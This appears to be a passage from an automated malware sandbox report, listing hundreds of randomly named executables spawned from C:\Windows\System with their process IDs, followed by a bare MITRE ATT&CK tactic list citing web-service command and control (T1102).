- C:\Windows\System\xGYukQs.exe
  C:\Windows\System\xGYukQs.exe
  2⤵
  PID:8984
- C:\Windows\System\hzRoJDj.exe
  C:\Windows\System\hzRoJDj.exe
  2⤵
  PID:9004
- C:\Windows\System\jlfFchp.exe
  C:\Windows\System\jlfFchp.exe
  2⤵
  PID:9044
- C:\Windows\System\kCSRkLb.exe
  C:\Windows\System\kCSRkLb.exe
  2⤵
  PID:9064
- C:\Windows\System\DVzDcxU.exe
  C:\Windows\System\DVzDcxU.exe
  2⤵
  PID:9092
- C:\Windows\System\StbYIbp.exe
  C:\Windows\System\StbYIbp.exe
  2⤵
  PID:9128
- C:\Windows\System\bLzEkVY.exe
  C:\Windows\System\bLzEkVY.exe
  2⤵
  PID:9148
- C:\Windows\System\ZYsnrYp.exe
  C:\Windows\System\ZYsnrYp.exe
  2⤵
  PID:9196
- C:\Windows\System\xWIkRoh.exe
  C:\Windows\System\xWIkRoh.exe
  2⤵
  PID:7408
- C:\Windows\System\QOqAEtv.exe
  C:\Windows\System\QOqAEtv.exe
  2⤵
  PID:8240
- C:\Windows\System\lEsLRkz.exe
  C:\Windows\System\lEsLRkz.exe
  2⤵
  PID:8416
- C:\Windows\System\qjOzNot.exe
  C:\Windows\System\qjOzNot.exe
  2⤵
  PID:8464
- C:\Windows\System\rWpuqRH.exe
  C:\Windows\System\rWpuqRH.exe
  2⤵
  PID:8528
- C:\Windows\System\EfxcQtg.exe
  C:\Windows\System\EfxcQtg.exe
  2⤵
  PID:8564
- C:\Windows\System\NCpzMQM.exe
  C:\Windows\System\NCpzMQM.exe
  2⤵
  PID:8624
- C:\Windows\System\GcbvnHS.exe
  C:\Windows\System\GcbvnHS.exe
  2⤵
  PID:8648
- C:\Windows\System\mEKoJBq.exe
  C:\Windows\System\mEKoJBq.exe
  2⤵
  PID:1120
- C:\Windows\System\XajvkpU.exe
  C:\Windows\System\XajvkpU.exe
  2⤵
  PID:7756
- C:\Windows\System\yvIKPuq.exe
  C:\Windows\System\yvIKPuq.exe
  2⤵
  PID:8852
- C:\Windows\System\anbRLXK.exe
  C:\Windows\System\anbRLXK.exe
  2⤵
  PID:8924
- C:\Windows\System\wkWOZiF.exe
  C:\Windows\System\wkWOZiF.exe
  2⤵
  PID:8100
- C:\Windows\System\ohOIbkF.exe
  C:\Windows\System\ohOIbkF.exe
  2⤵
  PID:8236
- C:\Windows\System\ZNHlHKl.exe
  C:\Windows\System\ZNHlHKl.exe
  2⤵
  PID:8360
- C:\Windows\System\JiWpusI.exe
  C:\Windows\System\JiWpusI.exe
  2⤵
  PID:8388
- C:\Windows\System\gSyFiLM.exe
  C:\Windows\System\gSyFiLM.exe
  2⤵
  PID:8600
- C:\Windows\System\toffnOk.exe
  C:\Windows\System\toffnOk.exe
  2⤵
  PID:8656
- C:\Windows\System\FcJavxl.exe
  C:\Windows\System\FcJavxl.exe
  2⤵
  PID:8832
- C:\Windows\System\ObGmTku.exe
  C:\Windows\System\ObGmTku.exe
  2⤵
  PID:8848
- C:\Windows\System\uQxPZVv.exe
  C:\Windows\System\uQxPZVv.exe
  2⤵
  PID:8900
- C:\Windows\System\BEfkHRC.exe
  C:\Windows\System\BEfkHRC.exe
  2⤵
  PID:9228
- C:\Windows\System\zRaXAgj.exe
  C:\Windows\System\zRaXAgj.exe
  2⤵
  PID:9244
- C:\Windows\System\BnfLYXs.exe
  C:\Windows\System\BnfLYXs.exe
  2⤵
  PID:9260
- C:\Windows\System\gfgkioJ.exe
  C:\Windows\System\gfgkioJ.exe
  2⤵
  PID:9276
- C:\Windows\System\XPQaHlX.exe
  C:\Windows\System\XPQaHlX.exe
  2⤵
  PID:9292
- C:\Windows\System\gGfKkMJ.exe
  C:\Windows\System\gGfKkMJ.exe
  2⤵
  PID:9308
- C:\Windows\System\PWZGZuG.exe
  C:\Windows\System\PWZGZuG.exe
  2⤵
  PID:9324
- C:\Windows\System\fqQnBpb.exe
  C:\Windows\System\fqQnBpb.exe
  2⤵
  PID:9340
- C:\Windows\System\xyEjBMk.exe
  C:\Windows\System\xyEjBMk.exe
  2⤵
  PID:9356
- C:\Windows\System\GbjIQmq.exe
  C:\Windows\System\GbjIQmq.exe
  2⤵
  PID:9372
- C:\Windows\System\ygDSpch.exe
  C:\Windows\System\ygDSpch.exe
  2⤵
  PID:9388
- C:\Windows\System\TxuIjKr.exe
  C:\Windows\System\TxuIjKr.exe
  2⤵
  PID:9420
- C:\Windows\System\CEHYUnF.exe
  C:\Windows\System\CEHYUnF.exe
  2⤵
  PID:9440
- C:\Windows\System\lJyMVxP.exe
  C:\Windows\System\lJyMVxP.exe
  2⤵
  PID:9456
- C:\Windows\System\hPiiwyr.exe
  C:\Windows\System\hPiiwyr.exe
  2⤵
  PID:9476
- C:\Windows\System\LjWesYq.exe
  C:\Windows\System\LjWesYq.exe
  2⤵
  PID:9512
- C:\Windows\System\HUISjKs.exe
  C:\Windows\System\HUISjKs.exe
  2⤵
  PID:9544
- C:\Windows\System\TtAwlYW.exe
  C:\Windows\System\TtAwlYW.exe
  2⤵
  PID:9592
- C:\Windows\System\DhkoBmJ.exe
  C:\Windows\System\DhkoBmJ.exe
  2⤵
  PID:9824
- C:\Windows\System\EGpKJtX.exe
  C:\Windows\System\EGpKJtX.exe
  2⤵
  PID:9900
- C:\Windows\System\GoVktQQ.exe
  C:\Windows\System\GoVktQQ.exe
  2⤵
  PID:9924
- C:\Windows\System\GFvpuTu.exe
  C:\Windows\System\GFvpuTu.exe
  2⤵
  PID:9960
- C:\Windows\System\XlsqZCn.exe
  C:\Windows\System\XlsqZCn.exe
  2⤵
  PID:9988
- C:\Windows\System\mefscgO.exe
  C:\Windows\System\mefscgO.exe
  2⤵
  PID:10012
- C:\Windows\System\nRkpVPG.exe
  C:\Windows\System\nRkpVPG.exe
  2⤵
  PID:10028
- C:\Windows\System\zxyJENA.exe
  C:\Windows\System\zxyJENA.exe
  2⤵
  PID:10048
- C:\Windows\System\qNSokSS.exe
  C:\Windows\System\qNSokSS.exe
  2⤵
  PID:10088
- C:\Windows\System\JEaMvyl.exe
  C:\Windows\System\JEaMvyl.exe
  2⤵
  PID:10120
- C:\Windows\System\KJweGwD.exe
  C:\Windows\System\KJweGwD.exe
  2⤵
  PID:10136
- C:\Windows\System\aaQydOn.exe
  C:\Windows\System\aaQydOn.exe
  2⤵
  PID:10156
- C:\Windows\System\MIJpQOc.exe
  C:\Windows\System\MIJpQOc.exe
  2⤵
  PID:10172
- C:\Windows\System\yMbIWuV.exe
  C:\Windows\System\yMbIWuV.exe
  2⤵
  PID:10208
- C:\Windows\System\qIeXsPw.exe
  C:\Windows\System\qIeXsPw.exe
  2⤵
  PID:10228
- C:\Windows\System\LnJczym.exe
  C:\Windows\System\LnJczym.exe
  2⤵
  PID:9116
- C:\Windows\System\GVpZtKN.exe
  C:\Windows\System\GVpZtKN.exe
  2⤵
  PID:8912
- C:\Windows\System\hGomskF.exe
  C:\Windows\System\hGomskF.exe
  2⤵
  PID:8572
- C:\Windows\System\cQNvpcr.exe
  C:\Windows\System\cQNvpcr.exe
  2⤵
  PID:9056
- C:\Windows\System\NNWBAdS.exe
  C:\Windows\System\NNWBAdS.exe
  2⤵
  PID:8968
- C:\Windows\System\NWWDLFh.exe
  C:\Windows\System\NWWDLFh.exe
  2⤵
  PID:9256
- C:\Windows\System\PfbwCwQ.exe
  C:\Windows\System\PfbwCwQ.exe
  2⤵
  PID:9332
- C:\Windows\System\XXnbAas.exe
  C:\Windows\System\XXnbAas.exe
  2⤵
  PID:9408
- C:\Windows\System\oBytAtD.exe
  C:\Windows\System\oBytAtD.exe
  2⤵
  PID:9188
- C:\Windows\System\WJHAsLV.exe
  C:\Windows\System\WJHAsLV.exe
  2⤵
  PID:9416
- C:\Windows\System\udLzNJa.exe
  C:\Windows\System\udLzNJa.exe
  2⤵
  PID:9504
- C:\Windows\System\jMJXLXH.exe
  C:\Windows\System\jMJXLXH.exe
  2⤵
  PID:9640
- C:\Windows\System\msTkuSR.exe
  C:\Windows\System\msTkuSR.exe
  2⤵
  PID:9588
- C:\Windows\System\SRaJvfQ.exe
  C:\Windows\System\SRaJvfQ.exe
  2⤵
  PID:9688
- C:\Windows\System\SpMivaG.exe
  C:\Windows\System\SpMivaG.exe
  2⤵
  PID:9728
- C:\Windows\System\PDFGKdF.exe
  C:\Windows\System\PDFGKdF.exe
  2⤵
  PID:9780
- C:\Windows\System\LXgNHQf.exe
  C:\Windows\System\LXgNHQf.exe
  2⤵
  PID:10000
- C:\Windows\System\vfZqIqj.exe
  C:\Windows\System\vfZqIqj.exe
  2⤵
  PID:10036
- C:\Windows\System\WNpnHzc.exe
  C:\Windows\System\WNpnHzc.exe
  2⤵
  PID:10144
- C:\Windows\System\CxlJGeI.exe
  C:\Windows\System\CxlJGeI.exe
  2⤵
  PID:10204
- C:\Windows\System\dKbqSsd.exe
  C:\Windows\System\dKbqSsd.exe
  2⤵
  PID:8592
- C:\Windows\System\MhLvOIK.exe
  C:\Windows\System\MhLvOIK.exe
  2⤵
  PID:9220
- C:\Windows\System\fFsrljB.exe
  C:\Windows\System\fFsrljB.exe
  2⤵
  PID:9016
- C:\Windows\System\NUxuuZC.exe
  C:\Windows\System\NUxuuZC.exe
  2⤵
  PID:9448
- C:\Windows\System\ZFfxcsE.exe
  C:\Windows\System\ZFfxcsE.exe
  2⤵
  PID:9320
- C:\Windows\System\wUVgQRX.exe
  C:\Windows\System\wUVgQRX.exe
  2⤵
  PID:9540
- C:\Windows\System\JenLtSB.exe
  C:\Windows\System\JenLtSB.exe
  2⤵
  PID:9712
- C:\Windows\System\dmkuZvQ.exe
  C:\Windows\System\dmkuZvQ.exe
  2⤵
  PID:9976
- C:\Windows\System\gEpkhHy.exe
  C:\Windows\System\gEpkhHy.exe
  2⤵
  PID:10076
- C:\Windows\System\vPSmzNz.exe
  C:\Windows\System\vPSmzNz.exe
  2⤵
  PID:8808
- C:\Windows\System\HEpOXwG.exe
  C:\Windows\System\HEpOXwG.exe
  2⤵
  PID:8732
- C:\Windows\System\yvvepsC.exe
  C:\Windows\System\yvvepsC.exe
  2⤵
  PID:9404
- C:\Windows\System\hlDyCov.exe
  C:\Windows\System\hlDyCov.exe
  2⤵
  PID:9576
- C:\Windows\System\TuarwMf.exe
  C:\Windows\System\TuarwMf.exe
  2⤵
  PID:10040
- C:\Windows\System\HQhsmWH.exe
  C:\Windows\System\HQhsmWH.exe
  2⤵
  PID:9584
- C:\Windows\System\zVZmcWt.exe
  C:\Windows\System\zVZmcWt.exe
  2⤵
  PID:9656
- C:\Windows\System\fuQUqUd.exe
  C:\Windows\System\fuQUqUd.exe
  2⤵
  PID:10272
- C:\Windows\System\dlnKKNP.exe
  C:\Windows\System\dlnKKNP.exe
  2⤵
  PID:10288
- C:\Windows\System\PDpOVbZ.exe
  C:\Windows\System\PDpOVbZ.exe
  2⤵
  PID:10308
- C:\Windows\System\AxQBaBl.exe
  C:\Windows\System\AxQBaBl.exe
  2⤵
  PID:10352
- C:\Windows\System\oTuWFli.exe
  C:\Windows\System\oTuWFli.exe
  2⤵
  PID:10376
- C:\Windows\System\RoRyCQF.exe
  C:\Windows\System\RoRyCQF.exe
  2⤵
  PID:10392
- C:\Windows\System\yTfeWLK.exe
  C:\Windows\System\yTfeWLK.exe
  2⤵
  PID:10408
- C:\Windows\System\jzoKjmV.exe
  C:\Windows\System\jzoKjmV.exe
  2⤵
  PID:10428
- C:\Windows\System\NflArdK.exe
  C:\Windows\System\NflArdK.exe
  2⤵
  PID:10448
- C:\Windows\System\JDPTmTM.exe
  C:\Windows\System\JDPTmTM.exe
  2⤵
  PID:10472
- C:\Windows\System\BaEOxTO.exe
  C:\Windows\System\BaEOxTO.exe
  2⤵
  PID:10556
- C:\Windows\System\wQGmMag.exe
  C:\Windows\System\wQGmMag.exe
  2⤵
  PID:10576
- C:\Windows\System\HiZiLOR.exe
  C:\Windows\System\HiZiLOR.exe
  2⤵
  PID:10596
- C:\Windows\System\VqvjDBU.exe
  C:\Windows\System\VqvjDBU.exe
  2⤵
  PID:10628
- C:\Windows\System\sREhkGm.exe
  C:\Windows\System\sREhkGm.exe
  2⤵
  PID:10664
- C:\Windows\System\VRLzpPS.exe
  C:\Windows\System\VRLzpPS.exe
  2⤵
  PID:10692
- C:\Windows\System\nrAXAmB.exe
  C:\Windows\System\nrAXAmB.exe
  2⤵
  PID:10712
- C:\Windows\System\friSKYP.exe
  C:\Windows\System\friSKYP.exe
  2⤵
  PID:10732
- C:\Windows\System\ChFamUL.exe
  C:\Windows\System\ChFamUL.exe
  2⤵
  PID:10760
- C:\Windows\System\sZHuEjo.exe
  C:\Windows\System\sZHuEjo.exe
  2⤵
  PID:10788
- C:\Windows\System\IwzavSF.exe
  C:\Windows\System\IwzavSF.exe
  2⤵
  PID:10812
- C:\Windows\System\TfMCtca.exe
  C:\Windows\System\TfMCtca.exe
  2⤵
  PID:10832
- C:\Windows\System\fTJfgVp.exe
  C:\Windows\System\fTJfgVp.exe
  2⤵
  PID:10856
- C:\Windows\System\cyAsoeo.exe
  C:\Windows\System\cyAsoeo.exe
  2⤵
  PID:10912
- C:\Windows\System\lnUIgyG.exe
  C:\Windows\System\lnUIgyG.exe
  2⤵
  PID:10944
- C:\Windows\System\dqFFhSC.exe
  C:\Windows\System\dqFFhSC.exe
  2⤵
  PID:10972
- C:\Windows\System\yQSGkyc.exe
  C:\Windows\System\yQSGkyc.exe
  2⤵
  PID:10992
- C:\Windows\System\VOoipyD.exe
  C:\Windows\System\VOoipyD.exe
  2⤵
  PID:11008
- C:\Windows\System\kvYWZPz.exe
  C:\Windows\System\kvYWZPz.exe
  2⤵
  PID:11024
- C:\Windows\System\JjIVnxq.exe
  C:\Windows\System\JjIVnxq.exe
  2⤵
  PID:11068
- C:\Windows\System\LAdeQcv.exe
  C:\Windows\System\LAdeQcv.exe
  2⤵
  PID:11092
- C:\Windows\System\FwXnddz.exe
  C:\Windows\System\FwXnddz.exe
  2⤵
  PID:11132
- C:\Windows\System\yYNtQdp.exe
  C:\Windows\System\yYNtQdp.exe
  2⤵
  PID:11164
- C:\Windows\System\RRiheQp.exe
  C:\Windows\System\RRiheQp.exe
  2⤵
  PID:11180
- C:\Windows\System\gWpsDdX.exe
  C:\Windows\System\gWpsDdX.exe
  2⤵
  PID:11204
- C:\Windows\System\KfLOFqu.exe
  C:\Windows\System\KfLOFqu.exe
  2⤵
  PID:11220
- C:\Windows\System\vTPoaul.exe
  C:\Windows\System\vTPoaul.exe
  2⤵
  PID:10248
- C:\Windows\System\reEvBMK.exe
  C:\Windows\System\reEvBMK.exe
  2⤵
  PID:10304
- C:\Windows\System\OuinyfI.exe
  C:\Windows\System\OuinyfI.exe
  2⤵
  PID:10360
- C:\Windows\System\DLBgdvG.exe
  C:\Windows\System\DLBgdvG.exe
  2⤵
  PID:10440
- C:\Windows\System\NrmgBUO.exe
  C:\Windows\System\NrmgBUO.exe
  2⤵
  PID:10484
- C:\Windows\System\NbDVtii.exe
  C:\Windows\System\NbDVtii.exe
  2⤵
  PID:10540
- C:\Windows\System\LlJpISm.exe
  C:\Windows\System\LlJpISm.exe
  2⤵
  PID:10568
- C:\Windows\System\qqlQNVF.exe
  C:\Windows\System\qqlQNVF.exe
  2⤵
  PID:10644
- C:\Windows\System\iAYeBjP.exe
  C:\Windows\System\iAYeBjP.exe
  2⤵
  PID:10728
- C:\Windows\System\ZXiyEZE.exe
  C:\Windows\System\ZXiyEZE.exe
  2⤵
  PID:10840
- C:\Windows\System\mVZBbZU.exe
  C:\Windows\System\mVZBbZU.exe
  2⤵
  PID:10888
- C:\Windows\System\ZcQVrEg.exe
  C:\Windows\System\ZcQVrEg.exe
  2⤵
  PID:10928
- C:\Windows\System\AYKhnYn.exe
  C:\Windows\System\AYKhnYn.exe
  2⤵
  PID:10984
- C:\Windows\System\SrMYyuR.exe
  C:\Windows\System\SrMYyuR.exe
  2⤵
  PID:11000
- C:\Windows\System\TCzucvJ.exe
  C:\Windows\System\TCzucvJ.exe
  2⤵
  PID:11120
- C:\Windows\System\lCYfXDh.exe
  C:\Windows\System\lCYfXDh.exe
  2⤵
  PID:11212
- C:\Windows\System\PZlIdQu.exe
  C:\Windows\System\PZlIdQu.exe
  2⤵
  PID:11248
- C:\Windows\System\saDxmIr.exe
  C:\Windows\System\saDxmIr.exe
  2⤵
  PID:10300
- C:\Windows\System\MoEEIIZ.exe
  C:\Windows\System\MoEEIIZ.exe
  2⤵
  PID:10436
- C:\Windows\System\trgAuHZ.exe
  C:\Windows\System\trgAuHZ.exe
  2⤵
  PID:10700
- C:\Windows\System\uidttuK.exe
  C:\Windows\System\uidttuK.exe
  2⤵
  PID:10964
- C:\Windows\System\OqxCxja.exe
  C:\Windows\System\OqxCxja.exe
  2⤵
  PID:10936
- C:\Windows\System\elifwlI.exe
  C:\Windows\System\elifwlI.exe
  2⤵
  PID:11172
- C:\Windows\System\Cxbstwf.exe
  C:\Windows\System\Cxbstwf.exe
  2⤵
  PID:10384
- C:\Windows\System\ENKLLCk.exe
  C:\Windows\System\ENKLLCk.exe
  2⤵
  PID:10640
- C:\Windows\System\zuigwPb.exe
  C:\Windows\System\zuigwPb.exe
  2⤵
  PID:10872
- C:\Windows\System\lwlDTJC.exe
  C:\Windows\System\lwlDTJC.exe
  2⤵
  PID:11128
- C:\Windows\System\gtBrpVT.exe
  C:\Windows\System\gtBrpVT.exe
  2⤵
  PID:11276
- C:\Windows\System\qwpxJgX.exe
  C:\Windows\System\qwpxJgX.exe
  2⤵
  PID:11292
- C:\Windows\System\TfGpUce.exe
  C:\Windows\System\TfGpUce.exe
  2⤵
  PID:11336
- C:\Windows\System\sVAmoPX.exe
  C:\Windows\System\sVAmoPX.exe
  2⤵
  PID:11360
- C:\Windows\System\LikcvbX.exe
  C:\Windows\System\LikcvbX.exe
  2⤵
  PID:11376
- C:\Windows\System\Xooptur.exe
  C:\Windows\System\Xooptur.exe
  2⤵
  PID:11420
- C:\Windows\System\tqlIODO.exe
  C:\Windows\System\tqlIODO.exe
  2⤵
  PID:11440
- C:\Windows\System\vPkLaBw.exe
  C:\Windows\System\vPkLaBw.exe
  2⤵
  PID:11460
- C:\Windows\System\myUCwDY.exe
  C:\Windows\System\myUCwDY.exe
  2⤵
  PID:11492
- C:\Windows\System\wDIECOs.exe
  C:\Windows\System\wDIECOs.exe
  2⤵
  PID:11516
- C:\Windows\System\wRfUIta.exe
  C:\Windows\System\wRfUIta.exe
  2⤵
  PID:11532
- C:\Windows\System\wSgvxMu.exe
  C:\Windows\System\wSgvxMu.exe
  2⤵
  PID:11556
- C:\Windows\System\AGQNeHy.exe
  C:\Windows\System\AGQNeHy.exe
  2⤵
  PID:11576
- C:\Windows\System\wYcBpys.exe
  C:\Windows\System\wYcBpys.exe
  2⤵
  PID:11596
- C:\Windows\System\rAVUJXj.exe
  C:\Windows\System\rAVUJXj.exe
  2⤵
  PID:11636
- C:\Windows\System\HCwTkWz.exe
  C:\Windows\System\HCwTkWz.exe
  2⤵
  PID:11688
- C:\Windows\System\SaszoxU.exe
  C:\Windows\System\SaszoxU.exe
  2⤵
  PID:11712
- C:\Windows\System\zYeorhF.exe
  C:\Windows\System\zYeorhF.exe
  2⤵
  PID:11740
- C:\Windows\System\CkARNaQ.exe
  C:\Windows\System\CkARNaQ.exe
  2⤵
  PID:11772
- C:\Windows\System\nMudHHh.exe
  C:\Windows\System\nMudHHh.exe
  2⤵
  PID:11796
- C:\Windows\System\MBGANLU.exe
  C:\Windows\System\MBGANLU.exe
  2⤵
  PID:11816
- C:\Windows\System\yWGyZud.exe
  C:\Windows\System\yWGyZud.exe
  2⤵
  PID:11840
- C:\Windows\System\CRFGykZ.exe
  C:\Windows\System\CRFGykZ.exe
  2⤵
  PID:11864
- C:\Windows\System\hYgGmMn.exe
  C:\Windows\System\hYgGmMn.exe
  2⤵
  PID:11888
- C:\Windows\System\HtWwsQl.exe
  C:\Windows\System\HtWwsQl.exe
  2⤵
  PID:11908
- C:\Windows\System\TLghQrL.exe
  C:\Windows\System\TLghQrL.exe
  2⤵
  PID:11932
- C:\Windows\System\sGcIHSu.exe
  C:\Windows\System\sGcIHSu.exe
  2⤵
  PID:11980
- C:\Windows\System\kluipJP.exe
  C:\Windows\System\kluipJP.exe
  2⤵
  PID:12000
- C:\Windows\System\vrzKPSI.exe
  C:\Windows\System\vrzKPSI.exe
  2⤵
  PID:12032
- C:\Windows\System\dXqxyur.exe
  C:\Windows\System\dXqxyur.exe
  2⤵
  PID:12052
- C:\Windows\System\ptaUkwk.exe
  C:\Windows\System\ptaUkwk.exe
  2⤵
  PID:12088
- C:\Windows\System\ZBCldlg.exe
  C:\Windows\System\ZBCldlg.exe
  2⤵
  PID:12144
- C:\Windows\System\iSLdjXr.exe
  C:\Windows\System\iSLdjXr.exe
  2⤵
  PID:12164
- C:\Windows\System\qpsAOOH.exe
  C:\Windows\System\qpsAOOH.exe
  2⤵
  PID:12184
- C:\Windows\System\ACTqHYj.exe
  C:\Windows\System\ACTqHYj.exe
  2⤵
  PID:12224
- C:\Windows\System\NKBhYtz.exe
  C:\Windows\System\NKBhYtz.exe
  2⤵
  PID:12256
- C:\Windows\System\Zqrsfmu.exe
  C:\Windows\System\Zqrsfmu.exe
  2⤵
  PID:10756
- C:\Windows\System\mqmVISg.exe
  C:\Windows\System\mqmVISg.exe
  2⤵
  PID:11272
- C:\Windows\System\GAsjkYK.exe
  C:\Windows\System\GAsjkYK.exe
  2⤵
  PID:11332
- C:\Windows\System\dmOadhF.exe
  C:\Windows\System\dmOadhF.exe
  2⤵
  PID:11352
- C:\Windows\System\ESQSCey.exe
  C:\Windows\System\ESQSCey.exe
  2⤵
  PID:11428
- C:\Windows\System\AxBEQzQ.exe
  C:\Windows\System\AxBEQzQ.exe
  2⤵
  PID:11488
- C:\Windows\System\AnMmMPF.exe
  C:\Windows\System\AnMmMPF.exe
  2⤵
  PID:11508
- C:\Windows\System\pNENoZW.exe
  C:\Windows\System\pNENoZW.exe
  2⤵
  PID:11676
- C:\Windows\System\EviaayO.exe
  C:\Windows\System\EviaayO.exe
  2⤵
  PID:11708
- C:\Windows\System\ypacnsK.exe
  C:\Windows\System\ypacnsK.exe
  2⤵
  PID:11768
- C:\Windows\System\QvhEjSN.exe
  C:\Windows\System\QvhEjSN.exe
  2⤵
  PID:11836
- C:\Windows\System\AExkEoi.exe
  C:\Windows\System\AExkEoi.exe
  2⤵
  PID:11928
- C:\Windows\System\KDSePWJ.exe
  C:\Windows\System\KDSePWJ.exe
  2⤵
  PID:12040
- C:\Windows\System\KkiQBDH.exe
  C:\Windows\System\KkiQBDH.exe
  2⤵
  PID:12048
- C:\Windows\System\zHUVLJp.exe
  C:\Windows\System\zHUVLJp.exe
  2⤵
  PID:12112
- C:\Windows\System\QsxTKmM.exe
  C:\Windows\System\QsxTKmM.exe
  2⤵
  PID:12176
- C:\Windows\System\wmngoWm.exe
  C:\Windows\System\wmngoWm.exe
  2⤵
  PID:12280
- C:\Windows\System\Kyaogzx.exe
  C:\Windows\System\Kyaogzx.exe
  2⤵
  PID:11368
- C:\Windows\System\txzsWtK.exe
  C:\Windows\System\txzsWtK.exe
  2⤵
  PID:11388
- C:\Windows\System\jciBVsy.exe
  C:\Windows\System\jciBVsy.exe
  2⤵
  PID:11724
- C:\Windows\System\yCRmOJC.exe
  C:\Windows\System\yCRmOJC.exe
  2⤵
  PID:11632
- C:\Windows\System\ITFqOlg.exe
  C:\Windows\System\ITFqOlg.exe
  2⤵
  PID:11880
- C:\Windows\System\tcJtHWP.exe
  C:\Windows\System\tcJtHWP.exe
  2⤵
  PID:12128
- C:\Windows\System\aCCFtFL.exe
  C:\Windows\System\aCCFtFL.exe
  2⤵
  PID:12080
- C:\Windows\System\SNABSIz.exe
  C:\Windows\System\SNABSIz.exe
  2⤵
  PID:11328
- C:\Windows\System\garpTfc.exe
  C:\Windows\System\garpTfc.exe
  2⤵
  PID:11592
- C:\Windows\System\TLsgLQi.exe
  C:\Windows\System\TLsgLQi.exe
  2⤵
  PID:12024
- C:\Windows\System\meGzBMY.exe
  C:\Windows\System\meGzBMY.exe
  2⤵
  PID:11824
- C:\Windows\System\bYiKaLK.exe
  C:\Windows\System\bYiKaLK.exe
  2⤵
  PID:12340
- C:\Windows\System\Tlzilpo.exe
  C:\Windows\System\Tlzilpo.exe
  2⤵
  PID:12360
- C:\Windows\System\LcggcQL.exe
  C:\Windows\System\LcggcQL.exe
  2⤵
  PID:12376
- C:\Windows\System\fLpgyPE.exe
  C:\Windows\System\fLpgyPE.exe
  2⤵
  PID:12392
- C:\Windows\System\eusSOus.exe
  C:\Windows\System\eusSOus.exe
  2⤵
  PID:12408
- C:\Windows\System\TBkvkhH.exe
  C:\Windows\System\TBkvkhH.exe
  2⤵
  PID:12424
- C:\Windows\System\HMUTpQb.exe
  C:\Windows\System\HMUTpQb.exe
  2⤵
  PID:12440
- C:\Windows\System\EnKkPjH.exe
  C:\Windows\System\EnKkPjH.exe
  2⤵
  PID:12456
- C:\Windows\System\qtVbRAs.exe
  C:\Windows\System\qtVbRAs.exe
  2⤵
  PID:12480
- C:\Windows\System\yVXQODD.exe
  C:\Windows\System\yVXQODD.exe
  2⤵
  PID:12496
- C:\Windows\System\lfkgUgL.exe
  C:\Windows\System\lfkgUgL.exe
  2⤵
  PID:12512
- C:\Windows\System\YmCSAwe.exe
  C:\Windows\System\YmCSAwe.exe
  2⤵
  PID:12532
- C:\Windows\System\UDDVhEP.exe
  C:\Windows\System\UDDVhEP.exe
  2⤵
  PID:12556
- C:\Windows\System\fmuWShU.exe
  C:\Windows\System\fmuWShU.exe
  2⤵
  PID:12576
- C:\Windows\System\bTtqiLP.exe
  C:\Windows\System\bTtqiLP.exe
  2⤵
  PID:12596
- C:\Windows\System\NWkiiwW.exe
  C:\Windows\System\NWkiiwW.exe
  2⤵
  PID:12688
- C:\Windows\System\DQnSGiu.exe
  C:\Windows\System\DQnSGiu.exe
  2⤵
  PID:12776
- C:\Windows\System\TrLxgmQ.exe
  C:\Windows\System\TrLxgmQ.exe
  2⤵
  PID:12824
- C:\Windows\System\UHbsFpA.exe
  C:\Windows\System\UHbsFpA.exe
  2⤵
  PID:12840
- C:\Windows\System\AhRGPNP.exe
  C:\Windows\System\AhRGPNP.exe
  2⤵
  PID:12860
- C:\Windows\System\rqdBLou.exe
  C:\Windows\System\rqdBLou.exe
  2⤵
  PID:12888
- C:\Windows\System\iucGOom.exe
  C:\Windows\System\iucGOom.exe
  2⤵
  PID:12916
- C:\Windows\System\tUMbCzJ.exe
  C:\Windows\System\tUMbCzJ.exe
  2⤵
  PID:12948
- C:\Windows\System\ZsYhdss.exe
  C:\Windows\System\ZsYhdss.exe
  2⤵
  PID:12980
- C:\Windows\System\HLnagbK.exe
  C:\Windows\System\HLnagbK.exe
  2⤵
  PID:12996
- C:\Windows\System\EtQpyky.exe
  C:\Windows\System\EtQpyky.exe
  2⤵
  PID:13016
- C:\Windows\System\PhsLaLo.exe
  C:\Windows\System\PhsLaLo.exe
  2⤵
  PID:13036
- C:\Windows\System\WXpjtSe.exe
  C:\Windows\System\WXpjtSe.exe
  2⤵
  PID:13060
- C:\Windows\System\oOFhySy.exe
  C:\Windows\System\oOFhySy.exe
  2⤵
  PID:13084
- C:\Windows\System\AhHzRxv.exe
  C:\Windows\System\AhHzRxv.exe
  2⤵
  PID:13140
- C:\Windows\System\KoRMRhR.exe
  C:\Windows\System\KoRMRhR.exe
  2⤵
  PID:13160
- C:\Windows\System\xdPwYXi.exe
  C:\Windows\System\xdPwYXi.exe
  2⤵
  PID:13200
- C:\Windows\System\BoppZNP.exe
  C:\Windows\System\BoppZNP.exe
  2⤵
  PID:13216
- C:\Windows\System\BVILgfK.exe
  C:\Windows\System\BVILgfK.exe
  2⤵
  PID:13256
- C:\Windows\System\mCXrusD.exe
  C:\Windows\System\mCXrusD.exe
  2⤵
  PID:13284
- C:\Windows\System\YjjzLAP.exe
  C:\Windows\System\YjjzLAP.exe
  2⤵
  PID:13300
- C:\Windows\System\CfEFKnj.exe
  C:\Windows\System\CfEFKnj.exe
  2⤵
  PID:5104
- C:\Windows\System\npvHlJW.exe
  C:\Windows\System\npvHlJW.exe
  2⤵
  PID:12368
- C:\Windows\System\yuxJzfn.exe
  C:\Windows\System\yuxJzfn.exe
  2⤵
  PID:12388
- C:\Windows\System\IppdAIM.exe
  C:\Windows\System\IppdAIM.exe
  2⤵
  PID:4156
- C:\Windows\System\iSlXCMa.exe
  C:\Windows\System\iSlXCMa.exe
  2⤵
  PID:12400
- C:\Windows\System\KNhMpHZ.exe
  C:\Windows\System\KNhMpHZ.exe
  2⤵
  PID:12524
- C:\Windows\System\xVsahoD.exe
  C:\Windows\System\xVsahoD.exe
  2⤵
  PID:12608
- C:\Windows\System\wGamiiO.exe
  C:\Windows\System\wGamiiO.exe
  2⤵
  PID:12588
- C:\Windows\System\EXOTzsR.exe
  C:\Windows\System\EXOTzsR.exe
  2⤵
  PID:12796
- C:\Windows\System\PQbgXwZ.exe
  C:\Windows\System\PQbgXwZ.exe
  2⤵
  PID:12800
- C:\Windows\System\nVyMmIR.exe
  C:\Windows\System\nVyMmIR.exe
  2⤵
  PID:1556
- C:\Windows\System\bEWLApd.exe
  C:\Windows\System\bEWLApd.exe
  2⤵
  PID:13032
- C:\Windows\System\EnNQStK.exe
  C:\Windows\System\EnNQStK.exe
  2⤵
  PID:13008

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

